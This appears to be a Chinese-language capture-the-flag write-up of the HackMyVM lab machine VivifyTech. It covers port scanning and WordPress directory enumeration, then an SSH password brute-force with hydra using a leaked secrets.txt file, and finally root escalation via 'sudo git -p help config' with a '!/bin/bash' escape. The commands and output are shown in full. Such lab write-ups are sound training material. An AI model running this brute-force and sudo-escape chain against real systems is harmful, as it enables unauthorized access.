渗透思路
- 信息收集
- 端口扫描
- 端口服务信息
- 目录扫描
- 爆破hydra--ssh
- git提权
信息收集
┌──(kali㉿kali)-[~]
└─$ fping -ag 192.168.9.0/24 2>/dev/null
192.168.9.119 --主机
192.168.9.164 --靶机
个人习惯,也方便后续操作,将IP地址赋值给一个变量Iip
┌──(kali㉿kali)-[~]
└─$ ip=192.168.9.164
┌──(kali㉿kali)-[~]
└─$ echo $ip
192.168.9.164
端口扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.9.164 --min-rate 10000
[sudo] kali 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:27 EDT
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 192.168.9.163, 16) => Operation not permitted
Offending packet: TCP 192.168.9.119:38222 > 192.168.9.163:64573 S ttl=58 id=33393 iplen=44 seq=1503250300 win=1024 <mss 1460>
Nmap scan report for 192.168.9.163
Host is up (0.085s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 66.54 seconds
开放3306:masql数据库的端口和33060:mysqlx不知道33060上网了解一下
MySQL X是一种用于MySQL数据库的新协议,它支持文档存储和异步操作,通常用于实现更高级的数据库功能
端口服务信息
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p- $ip
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-29 05:48 EDT
Nmap scan report for 192.168.9.164
Host is up (0.010s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.57 ((Debian))
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=4/29%Time=662F6CE5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\
SF:x08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20me
SF:ssage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAN
SF:Desk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\
SF:0\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRP
SF:C,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid
SF:\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10
SF:\x88'\x1a\x0fInvalid\x20message\"\x05HY000");
MAC Address: 08:00:27:EC:74:96 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds
80端口如图,扫目录
目录扫描
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.9.164 -x 500,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/http_192.168.9.164/_24-04-29_05-53-24.txt
Target: http://192.168.9.164/
[05:53:24] Starting:
[05:53:27] 403 - 278B - /.ht_wsr.txt
[05:53:27] 403 - 278B - /.htaccess.orig
[05:53:27] 403 - 278B - /.htaccess.bak1
[05:53:27] 403 - 278B - /.htaccess.save
[05:53:27] 403 - 278B - /.htaccess.sample
[05:53:27] 403 - 278B - /.htaccess_sc
[05:53:27] 403 - 278B - /.htaccessOLD
[05:53:27] 403 - 278B - /.htm
[05:53:27] 403 - 278B - /.htaccess_orig
[05:53:27] 403 - 278B - /.htaccessOLD2
[05:53:27] 403 - 278B - /.htaccess_extra
[05:53:27] 403 - 278B - /.htaccessBAK
[05:53:27] 403 - 278B - /.html
[05:53:27] 403 - 278B - /.htpasswds
[05:53:27] 403 - 278B - /.httr-oauth
[05:53:28] 403 - 278B - /.htpasswd_test
[05:53:29] 403 - 278B - /.php
[05:54:28] 403 - 278B - /server-status
[05:54:28] 403 - 278B - /server-status/
[05:54:49] 200 - 2KB - /wordpress/wp-login.php
[05:54:50] 200 - 14KB - /wordpress/
Task Completed
扫到一个wordpress目录,还有登录页面
一看就是wordpress的cms,在扫描一下
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.168.9.164/wordpress/
[sudo] kali 的密码:
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/http_192.168.9.164/_wordpress__24-04-29_06-17-53.txt
Target: http://192.168.9.164/
。。。
[06:18:33] 301 - 0B - /wordpress/index.php -> http://192.168.9.164/wordpress/
[06:18:34] 404 - 55KB - /wordpress/index.php/login/
[06:18:37] 200 - 7KB - /wordpress/license.txt
[06:18:54] 200 - 3KB - /wordpress/readme.html
[06:19:16] 301 - 327B - /wordpress/wp-admin -> http://192.168.9.164/wordpress/wp-admin/
[06:19:16] 400 - 1B - /wordpress/wp-admin/admin-ajax.php
[06:19:16] 409 - 3KB - /wordpress/wp-admin/setup-config.php
[06:19:16] 200 - 0B - /wordpress/wp-config.php
[06:19:16] 200 - 498B - /wordpress/wp-admin/install.php
[06:19:16] 302 - 0B - /wordpress/wp-admin/ -> http://192.168.9.164/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.164%2Fwordpress%2Fwp-admin%2F&reauth=1
[06:19:16] 301 - 329B - /wordpress/wp-content -> http://192.168.9.164/wordpress/wp-content/
[06:19:16] 200 - 0B - /wordpress/wp-content/
[06:19:16] 200 - 84B - /wordpress/wp-content/plugins/akismet/akismet.php
[06:19:16] 500 - 0B - /wordpress/wp-content/plugins/hello.php
[06:19:16] 200 - 422B - /wordpress/wp-content/upgrade/
[06:19:16] 200 - 483B - /wordpress/wp-content/uploads/
[06:19:17] 301 - 330B - /wordpress/wp-includes -> http://192.168.9.164/wordpress/wp-includes/
[06:19:17] 200 - 5KB - /wordpress/wp-includes/
[06:19:17] 200 - 0B - /wordpress/wp-cron.php
[06:19:17] 200 - 2KB - /wordpress/wp-login.php
[06:19:17] 200 - 0B - /wordpress/wp-includes/rss-functions.php
[06:19:17] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.9.164/wordpress/wp-login.php?action=register
[06:19:17] 405 - 42B - /wordpress/xmlrpc.php
发现很多的200,一个一个的访问
在 http://192.168.9.164/wordpress/wp-includes/中发现目录遍历
在所有的.php文件中要么时空白页面被解析,要么不能访问,终于找到一个
http://192.168.9.164/wordpress/wp-includes/secrets.txt,文本文件,应该是用户名的密码,但是user在哪,不知道
看了老外的文章,找到了user用户。。。。英文不好一大冰,每每遇到English,就会自动跳过
爆破hydra–ssh
先下载密码
┌──(kali㉿kali)-[~]
└─$ wget http://192.168.9.164/wordpress/wp-includes/secrets.txt
--2024-04-29 06:46:52-- http://192.168.9.164/wordpress/wp-includes/secrets.txt
正在连接 192.168.9.164:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:439 [text/plain]
正在保存至: “secrets.txt”
secrets.txt 100%[=========================================================================================================================================================================>] 439 --.-KB/s 用时 0s
2024-04-29 06:46:52 (14.1 MB/s) - 已保存 “secrets.txt” [439/439])
创建用户列表
sarah
mark
emily
jake
alex
┌──(kali㉿kali)-[~]
└─$ sudo hydra -L user.txt -P secrets.txt $ip ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-29 06:53:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 240 login tries (l:5/p:48), ~15 tries per task
[DATA] attacking ssh://192.168.9.164:22/
[22][ssh] host: 192.168.9.164 login: sarah password: bohicon
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-29 06:54:28
得到账号密码sarah :bohicon
成功登录
┌──(kali㉿kali)-[~]
└─$ ssh sarah@$ip
The authenticity of host '192.168.9.164 (192.168.9.164)' can't be established.
ED25519 key fingerprint is SHA256:i4eLII3uzJGiSMrTFLLAnrihC0r7/y6uuO7YMmGF7Rs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.164' (ED25519) to the list of known hosts.
sarah@192.168.9.164's password:
Linux VivifyTech 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
#######################################
# Welcome to VivifyTech ! #
# The place to be :) #
#######################################
Last login: Tue Dec 5 17:54:16 2023 from 192.168.177.129
sarah@VivifyTech:~$ sudo -l
[sudo] password for sarah:
Sorry, user sarah may not run sudo on VivifyTech.
sarah@VivifyTech:~$ whoami
sarah
sarah@VivifyTech:~$ ls -al
total 32
drwx------ 4 sarah sarah 4096 Dec 5 17:53 .
drwxr-xr-x 6 root root 4096 Dec 5 16:00 ..
-rw------- 1 sarah sarah 0 Dec 5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah 245 Dec 5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc
-rw------- 1 sarah sarah 0 Dec 5 17:49 .history
drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local
drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private
-rw-r--r-- 1 sarah sarah 807 Dec 5 15:57 .profile
-rw-r--r-- 1 sarah sarah 27 Dec 5 16:22 user.txt
转到gbodja发现是git提权
git提权
sudo git -p help config
!/bin/bash
root@VivifyTech:/home/sarah/.private# id
uid=0(root) gid=0(root) groups=0(root)
root@VivifyTech:/home/sarah/.private# cd /root
root@VivifyTech:~# ls
root.txt
root@VivifyTech:~# cat root.txt
HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
